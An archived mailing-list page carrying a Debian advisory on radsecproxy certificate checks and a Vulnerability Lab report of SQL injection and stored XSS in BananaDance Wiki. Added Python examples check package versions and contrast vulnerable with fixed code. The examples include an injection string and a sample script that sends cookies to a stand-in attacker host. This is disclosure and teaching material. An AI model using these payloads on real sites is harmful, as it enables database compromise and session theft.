[SECURITY] [DSA 2573-1] radsecproxy security update

2012-11-12 Thread Luciano Bello

------------------------------------------------------------------------
Debian Security Advisory DSA-2573-1                  secur...@debian.org
http://www.debian.org/security/                            Luciano Bello
November 10, 2012                     http://www.debian.org/security/faq
------------------------------------------------------------------------

Package: radsecproxy
Vulnerability  : SSL certificate verification weakness
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-4523 CVE-2012-4566

Ralf Paffrath reported that Radsecproxy, a RADIUS protocol proxy, mixed up 
pre- and post-handshake verification of clients. This vulnerability may
wrongly accept clients without checking their certificate chain under 
certain configurations.

Raphael Geissert spotted that the fix for CVE-2012-4523 was incomplete, 
giving origin to CVE-2012-4566. Both vulnerabilities are fixed with this 
update.

Notice that this fix may make Radsecproxy reject some clients that are 
currently (erroneously) being accepted.

For the stable distribution (squeeze), these problems have been fixed in
version 1.4-1+squeeze1.

For the testing distribution (wheezy), these problems have been fixed in
version 1.6.2-1.

For the unstable distribution (sid), these problems have been fixed in
version 1.6.2-1.

We recommend that you upgrade your radsecproxy packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
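An added check, not part of the advisory or of the radsecproxy project: the following Python reimplements Debian's package version ordering (the rules `dpkg --compare-versions` applies: epoch, then upstream version, then Debian revision, with `~` sorting before everything including end of string, letters before non-letters, and digit runs compared numerically) so that an installed version string can be tested offline against the fixed versions the advisory names. The suite-to-version table is taken from the advisory; the function names and the sample installed versions in the demo are this example's own. On a real host the installed version comes from `dpkg-query -W -f='${Version}' radsecproxy`.

```python
"""Debian version comparison, used to confirm an installed radsecproxy package is
at or above the fixed version named in DSA-2573-1.

Added example, not part of the advisory or of radsecproxy. It reimplements dpkg's
ordering rules so it runs offline; the fixed versions per suite are taken from the
advisory, everything else (names, sample inputs) is this example's own."""

# Fixed versions stated in DSA-2573-1 (suite -> version).
FIXED_VERSIONS = {
    "squeeze": "1.4-1+squeeze1",
    "wheezy": "1.6.2-1",
    "sid": "1.6.2-1",
}


def _order(c):
    """Sort weight of one character in a non-digit run, as dpkg defines it."""
    if c == "~":
        return -1            # '~' sorts before anything, even the end of the string
    if c == "" or c.isdigit():
        return 0             # end of string and digits end a non-digit run
    if c.isalpha():
        return ord(c)        # letters sort before non-letters ...
    return ord(c) + 256      # ... which are pushed above the ASCII range


def _cmp_fragment(a, b):
    """Compare two version fragments (upstream or revision); returns -1, 0 or 1."""
    i = j = 0
    while i < len(a) or j < len(b):
        # Non-digit run: compare character by character with dpkg's weights.
        while (i < len(a) and not a[i].isdigit()) or (j < len(b) and not b[j].isdigit()):
            ac = _order(a[i]) if i < len(a) else 0
            bc = _order(b[j]) if j < len(b) else 0
            if ac != bc:
                return -1 if ac < bc else 1
            i += 1
            j += 1
        # Digit run: compare numerically (an absent run counts as 0, leading zeros ignored).
        si, sj = i, j
        while i < len(a) and a[i].isdigit():
            i += 1
        while j < len(b) and b[j].isdigit():
            j += 1
        na = int(a[si:i]) if i > si else 0
        nb = int(b[sj:j]) if j > sj else 0
        if na != nb:
            return -1 if na < nb else 1
    return 0


def _split(version):
    """Split '[epoch:]upstream[-revision]' into (epoch, upstream, revision)."""
    epoch = 0
    if ":" in version:
        epoch_str, version = version.split(":", 1)
        epoch = int(epoch_str)
    if "-" in version:
        upstream, revision = version.rsplit("-", 1)   # last hyphen starts the revision
    else:
        upstream, revision = version, ""
    return epoch, upstream, revision


def compare_versions(a, b):
    """Return -1, 0 or 1, matching 'dpkg --compare-versions a lt|eq|gt b'."""
    ea, ua, ra = _split(a)
    eb, ub, rb = _split(b)
    if ea != eb:
        return -1 if ea < eb else 1
    result = _cmp_fragment(ua, ub)
    if result:
        return result
    return _cmp_fragment(ra, rb)


def is_fixed(installed, suite):
    """True when the installed version is at or above the DSA's fixed version for the suite."""
    return compare_versions(installed, FIXED_VERSIONS[suite]) >= 0


if __name__ == "__main__":
    # Constructed sample inputs; on a host, feed the output of:
    #   dpkg-query -W -f='${Version}' radsecproxy
    for suite, installed in [("squeeze", "1.4-1"), ("squeeze", "1.4-1+squeeze1"),
                             ("squeeze", "1.4-1~bpo60+1"), ("wheezy", "1.6.1-1"),
                             ("sid", "1.6.2-1")]:
        state = "fixed" if is_fixed(installed, suite) else "VULNERABLE"
        print(f"{suite}: radsecproxy {installed} -> {state}")
```

The `~` rule is the one worth knowing here: a backport-style revision such as 1~bpo60+1 sorts below 1, and therefore below 1+squeeze1, so a host carrying such a package is reported vulnerable rather than fixed, which is what dpkg itself would conclude.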



BananaDance Wiki b2.2 - Multiple Web Vulnerabilities

2012-11-12 Thread Vulnerability Lab
Title:
======
BananaDance Wiki b2.2 - Multiple Web Vulnerabilities


Date:
=====
2012-11-10


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=745


VL-ID:
======
745


Common Vulnerability Scoring System:
====================================
7.1


Introduction:
=============
Banana Dance is an open-source PHP/MySQL-based program. It is designed to combine the simplicity of wiki-publishing software with the versatility of a CMS. The program also promotes community-building through organized and user-rated commenting features. Highly flexible with theme-integration and extension availability, Banana Dance can be used for all types of purposes, whether it be to create an entire website, a product owner's manual, or an 'article'-posting site.

(Copy of the Vendor Homepage: http://www.bananadance.org )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official BananaDance Wiki b2.2 CMS.


Report-Timeline:
================
2012-11-10: Public or Non-Public Disclosure


Status:
=======
Published


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
1.1
A SQL injection vulnerability is detected in the BananaDance Wiki B2.2 Content Management System.
The vulnerability allows an attacker (remote) or a local privileged moderator/admin user account to execute their own SQL commands on the affected application DBMS. The SQL injection vulnerability is located in the user management module with the bound vulnerable alpha listing parameter. Successful exploitation of the vulnerability results in DBMS & application compromise. Exploitation requires no user interaction & no privileged user account.

Vulnerable Module(s):
[+] User Management

Vulnerable Parameter(s):
[+] alpha


1.2
Multiple persistent input validation vulnerabilities are detected in the BananaDance Wiki B2.2 Content Management System.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent) of the vulnerable module. The persistent vulnerabilities are located in the user, banned user and badge module listings with the bound vulnerable username and email parameters. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user interaction (view listing) & a registered low-privileged web application user account.

Vulnerable Module(s):
[+] Add User - Listing
[+] Banned User - Listing
[+] Badges - Listing

Vulnerable Parameter(s):
[+] Username & Email (Profile)


Proof of Concept:
=================
1.1
The SQL injection vulnerability can be exploited by local privileged user accounts and moderators.
For demonstration or to reproduce ...

PoC:
<html>
<head>
<title>BananaDance Wiki b2.2 - SQL Vulnerability</title>
</head>
<body>
<iframe src="http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users&alpha=A'-1 [SQL-INJECTION!]--" width="1000" height="800"></iframe>
<iframe src="http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users&alpha=M'-1 [SQL-INJECTION!]--" width="1000" height="800"></iframe>
<iframe src="http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users&alpha=K'-1 [SQL-INJECTION!]--" width="1000" height="800"></iframe>
</body>
</html>


1.2
The persistent input validation vulnerabilities can be exploited by a remote attacker with a low-privileged application user account and low required user interaction. For demonstration or to reproduce ...

Review: Add (Existing) User - Listing

<tr id="19">
<td valign="top"><center><img src="imgs/status-on.png" id="status19" alt="Active" title="Active" border="0" height="16" width="16"></center></td>
<td valign="top"><a href="index.php?l=users_edit&id=19">[PERSISTENT EXECUTION OF INJECTED SCRIPT CODE!];) = a=</a></td>
<td valign="top">2012-06-20</td>
<td valign="top"><span style="">ESTANDAR</span></td>
<td valign="top">0</td>
<td valign="top">0</td>
<td valign="top">0</td>
<td valign="top"><a href="#" onClick="deleteID('bd_users','19');return false;"><img src="imgs/icon-delete.png" border="0" alt="Delete" title="Delete" /></a></td>
</tr>

URL(s): 
http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users  
http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users_add


Risk:
=====
1.1
The security risk of the local SQL injection vulnerability is estimated as medium(+) because of the required moderator account.

1.2
The security risk of the persistent input validation vulnerabilities is estimated as high.


Credits:
========
Vulnerability Laboratory [Research Team]  - Kathrin SL 
(ka...@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a
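An added example, written here and not taken from BananaDance's code, modelling the two bug classes the advisory reports against a miniature of the admin user listing: an `alpha` filter that is concatenated into the SQL beside a parameterised version, and a username cell written out verbatim beside an HTML-escaped one. It uses Python's sqlite3 so it runs offline. The table name bd_users and the users_edit link come from the advisory's markup; the sample rows, the payload `A' OR 1=1--` and all function names are constructed for this example and are not claimed to match the real application.

```python
"""Miniature of an admin user listing filtered by an 'alpha' prefix parameter.

Added example, not BananaDance's code. Shows a concatenated query beside a bound
one (SQL injection through 'alpha') and verbatim beside escaped output of a stored
username (persistent script injection). Sample rows and payloads are constructed."""
import html
import sqlite3

# Constructed sample data; row 19 carries a username that is really a script tag.
SAMPLE_USERS = [
    (17, "Alice", "alice@example.org"),
    (18, "Anna", "anna@example.org"),
    (19, "<script>document.location='http://attacker.invalid/?c='+document.cookie</script>",
     "mallory@example.org"),
    (20, "Kathrin", "kathrin@example.org"),
]


def make_db():
    """In-memory table with the advisory's table name and the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE bd_users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO bd_users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def list_users_vulnerable(alpha, conn=None):
    """'alpha' is pasted into the query text: a quote in it rewrites the WHERE clause."""
    conn = conn or make_db()
    sql = f"SELECT username FROM bd_users WHERE username LIKE '{alpha}%' ORDER BY username"
    return [row[0] for row in conn.execute(sql)]


def list_users_safe(alpha, conn=None):
    """Bind the filter as a parameter; escape LIKE metacharacters so it stays a prefix match."""
    conn = conn or make_db()
    prefix = alpha.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT username FROM bd_users WHERE username LIKE ? ESCAPE '\\' ORDER BY username"
    return [row[0] for row in conn.execute(sql, (prefix + "%",))]


def render_user_cell_vulnerable(user_id, username):
    """Listing cell shaped like the advisory's markup, username written out verbatim."""
    return f'<td valign="top"><a href="index.php?l=users_edit&id={user_id}">{username}</a></td>'


def render_user_cell_safe(user_id, username):
    """Same cell with the username HTML-escaped, so stored input cannot become markup."""
    return (f'<td valign="top"><a href="index.php?l=users_edit&amp;id={int(user_id)}">'
            f'{html.escape(username, quote=True)}</a></td>')


if __name__ == "__main__":
    payload = "A' OR 1=1--"   # constructed injection value for the alpha parameter
    conn = make_db()
    print("concatenated, alpha=A       :", list_users_vulnerable("A", conn))
    print("concatenated, alpha=payload :", list_users_vulnerable(payload, conn))
    print("bound,        alpha=payload :", list_users_safe(payload, conn))
    for uid, name, _ in SAMPLE_USERS:
        print(render_user_cell_safe(uid, name))
```

With the concatenated query the quote in the payload closes the LIKE literal and `--` comments out the remainder, so every row comes back; with the bound parameter the same string is only a prefix that no username matches. Escaping for LIKE is a separate concern from escaping for SQL: binding stops the injection, and the ESCAPE clause keeps a `%` or `_` inside the filter from widening the match.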